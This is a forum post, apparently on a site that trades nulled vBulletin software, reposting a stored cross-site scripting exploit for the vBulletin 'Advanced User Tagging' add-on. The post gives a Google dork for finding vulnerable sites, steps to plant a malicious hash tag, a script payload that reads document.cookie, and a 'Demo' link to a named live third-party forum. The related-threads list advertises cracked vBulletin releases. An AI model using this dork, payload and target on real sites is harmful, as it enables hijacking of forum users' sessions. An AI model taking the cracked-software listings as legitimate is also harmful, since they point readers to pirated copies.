• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

    Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

VBulletin Advanced User Tagging Cross Site Scripting

Admin

Well-Known Member
Staff member
Administrator
# Exploit Title: Advanced User Tagging vBulletin -- Stored XSS Vulnerability
# Google Dork: intext:usertag_pro
# Date: 10.07.2013
# Exploit Author: []0iZy5
# Vendor Homepage: www.backtrack-linux.ro
# Version: vBulletin 3.8.x, vBulletin 4.x.x
# Tested on: Linux & Windows
#
################################################################################​##########
#
# Stage 1: Go to -> UserCP -> Hash Tag Subscriptions
# Direct Link:
Code:
http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription
#
# Stage 2: Add a malicious hash tag.
# Example:
HTML:
<script>alert(document.cookie)</script>

#
################################################################################​##########
#
# This was written for educational purpose only. use it at your own risk.
# Author will be not responsible for any damage caused! user assumes all responsibility.
# Intended for authorized web application pentesting only!​

Demo:
Code:
http://www.vbiran.ir/usertag.php?do=profile&action=hashsubscription
 

Facebook Comments

Similar threads
Thread starter Title Forum Replies Date
Admin Advanced Registration v1.1.1 for vBulletin v4.1.x PHP NULL-DGT Add-ons 1
L Xin xin các pro giúp vBulletin Vbulletin 3
Admin Change the height of the cke text editor vBulletin Vbulletin 0
Admin Social Media vBulletin 5 Add-ons 0
Admin Ratings-Feedback vBulletin 5x Add-ons 0
Admin DRC - Live Previews vBulletin 3.8.x Add-ons 0
Admin Yilmaz - Postbit Background Usergroups vBulletin 5.x Add-ons 0
Admin Yilmaz - Back to Top vBulletin 5.x Add-ons 0
Admin JB: hCaptcha Human Verification vBulletin 4.x,x Add-ons 0
Admin DRC - reCAPTCHA v3 vBulletin 3.x Add-ons 0
Admin vBulletin 5.6.4 is now available for Download Vbulletin 0
Admin Yilmaz - Easy Postbit User Information Settings vBulletin 3.8.x Add-ons 0
V Share vBulletin Connect 5.6.2 pl1 Nulled 5.6.2 pl1 Vbb released 0
Admin vBulletin Connect 5.6.3 is now available for download. Vbulletin 13
Admin ProjectvB4 - Alpha vBulletin 4.2.x Add-ons 0
Admin vBulletin Connect 5.5.4 nulled by tuoitreit.vn Add-ons 2
Admin eBay Search function - code updated vBulletin Add-ons 0
Admin Color in the forum link vBulletin Add-ons 0
Admin vBulletin Connect 5.5.3 nulled by tuoitreit.vn Add-ons 0
Admin Peel Away - Advertising vBulletin 5.4.x Add-ons 0
Admin Cloudflare Registration Tools vBulletin 4.2.5 Add-ons 0
Admin vBulletin 4.2.5 Green Style Add-ons 0
Admin All 31 skins from SultanTheme.com - for FREE and it's REAL for vBulletin 4.2.2 Add-ons 0
Admin Auto-Move Closed Reports vBulletin 4.x Add-ons 0
Admin Userprogress-Bar for vBulletin 5.4.x Add-ons 0
I Help vbulletin Connect 5.5.0 to xenforo 2.1.0 Xenforo 15
Admin vBulletin Connect 5.5.0 nulled by tuoitreit.vn Vbb released 9
Admin New Topic/Sub-Topic Online Effect Glow vBulletin 5.x Vbb tutorial 6
Admin Auto-Postbit Selector for Mobile Browsers vBulletin 4.x Vbulletin 0
Admin Duckways: Admin - Log in as vBulletin 5.x Vbulletin 0
Admin Duckways: Picr.me image hosting integration vBulletin 5.x Add-ons 0
Admin Hướng dẫn chuyển thanks từ vbulletin sang xenforo 1.5.x - Convert thanks vbulletin to like xenforo 1.5.x Xenforo 2
Admin Yilmaz - Owl Carousel vBulletin 5.x Vbulletin 9
Admin Hướng dẫn drop hàng loạt table rác aaggregate_temp cho vBulletin đơn giản Vbulletin 0
Admin vBulletin suite 4.2.5 nulled by tuoitreit.vn Vbb released 30
Admin vBulletin 4.2.3 PL2 patch only by tuoitreit.vn Vbb released 0
Admin Share lại code vbulletin newstyleclan Vbulletin 24
Admin vBulletin suite 4.2.3 PL1 patch only nulled by tuoitreit.vn Vbb released 8
Admin vBulletin suite 4.2.2 PL5 patch only nulled by tuoitreit.vn Vbb released 25
Admin Hướng dẫn backup dữ liệu vBulletin an toàn không lỗi bằng hình ảnh Vbb tutorial 0
Admin Hướng dẫn cải tiến chức năng thống kê nhanh trong admincp cho vBulletin Vbb tutorial 0
Admin vBulletin Suite 4.2.3 Beta 4 nulled by tuoitreit.vn Vbb released 19
Admin vBulletin suite 4.2.2 PL4 patch only nulled by tuoitreit.vn Vbb released 0
Admin vBulletin suite 4.2.2 PL3 patch only nulled by tuoitreit.vn Vbb released 3
Admin Phát hiện lỗ hổng bảo mật mới trên vbulletin 4.2.2 patch level 2 SQL injection 1
Admin Hướng dẫn đổi màu liên kết cho vbulletin Vbb tutorial 0
Admin Hướng dẫn thay màu chữ liên kết của tab navigation vbulletin Vbb tutorial 1
Admin Phát hiện lỗ hổng bảo mật mới trên vbulletin 4.2.2 và vbulletin 4.2.3 Exploit 0
Admin Hướng dẫn fix lỗi table passwordhistory doesn't exist cho vbulletin Vbb tutorial 0
Admin Hướng dẫn xóa toàn bộ chữ ký thành viên vbulletin Vbb tutorial 0

Similar threads

New posts New threads New resources

Back
Top